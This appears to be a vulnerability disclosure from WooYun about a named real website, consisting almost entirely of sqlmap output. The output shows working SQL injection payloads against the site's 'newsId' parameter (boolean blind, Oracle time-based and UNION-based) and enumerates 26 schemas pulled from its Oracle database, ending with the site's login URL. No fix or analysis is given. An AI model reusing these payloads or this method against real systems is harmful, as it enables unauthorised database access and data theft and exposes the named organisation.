WooYun.org

url:http://www.gdhydro.com/

http://www.gdhydro.com/MaritimeManage/portal/news/news_info.jsp?newsId=2149

[12:07:51] [INFO] testing 'Oracle AND time-based blind'
[12:08:22] [INFO] GET parameter 'newsId' seems to be 'Oracle AND time-based blin
d' injectable
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads s
pecific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Oracle' extending
 provided level (1) and risk (1) values? [Y/n] y
[12:08:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:08:27] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[12:08:27] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[12:08:30] [INFO] target URL appears to have 11 columns in query
[12:08:31] [INFO] GET parameter 'newsId' is 'Generic UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'newsId' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N] y
sqlmap identified the following injection points with a total of 44 HTTP(s) requ
ests:
---
Parameter: newsId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: newsId=2149 AND 3997=3997
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: newsId=2149 AND 8821=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(117)||C
HR(120)||CHR(97),5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: newsId=2149 UNION ALL SELECT NULL,CHR(113)||CHR(98)||CHR(106)||CHR(
106)||CHR(113)||CHR(88)||CHR(72)||CHR(117)||CHR(118)||CHR(106)||CHR(83)||CHR(104
)||CHR(66)||CHR(78)||CHR(108)||CHR(113)||CHR(118)||CHR(106)||CHR(112)||CHR(113),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
[12:08:34] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:08:34] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[12:08:34] [INFO] fetching database (schema) names
[12:08:34] [INFO] the SQL query used returns 26 entries
[12:08:35] [INFO] retrieved: CTXSYS
[12:08:36] [INFO] retrieved: DBSNMP
[12:08:36] [INFO] retrieved: DMSYS
[12:08:37] [INFO] retrieved: EXFSYS
[12:08:38] [INFO] retrieved: GDHPD
[12:08:38] [INFO] retrieved: GDHPDWEB
[12:08:39] [INFO] retrieved: HR
[12:08:40] [INFO] retrieved: IX
[12:08:40] [INFO] retrieved: MARITIME
[12:08:41] [INFO] retrieved: MDSYS
[12:08:42] [INFO] retrieved: NTM
[12:08:42] [INFO] retrieved: NTM_EN
[12:08:43] [INFO] retrieved: OE
[12:08:43] [INFO] retrieved: OLAPSYS
[12:08:44] [INFO] retrieved: ORDSYS
[12:08:45] [INFO] retrieved: OUTLN
[12:08:45] [INFO] retrieved: PM
[12:08:46] [INFO] retrieved: SCGRID
[12:08:47] [INFO] retrieved: SCOTT
[12:08:47] [INFO] retrieved: SH
[12:08:49] [INFO] retrieved: SYS
[12:08:50] [INFO] retrieved: SYSMAN
[12:08:50] [INFO] retrieved: SYSTEM
[12:08:51] [INFO] retrieved: TSMSYS
[12:08:52] [INFO] retrieved: WMSYS
[12:08:53] [INFO] retrieved: XDB
available databases [26]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDHPD
[*] GDHPDWEB
[*] HR
[*] IX
[*] MARITIME
[*] MDSYS
[*] NTM
[*] NTM_EN
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCGRID
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

http://www.gdhydro.com/login.html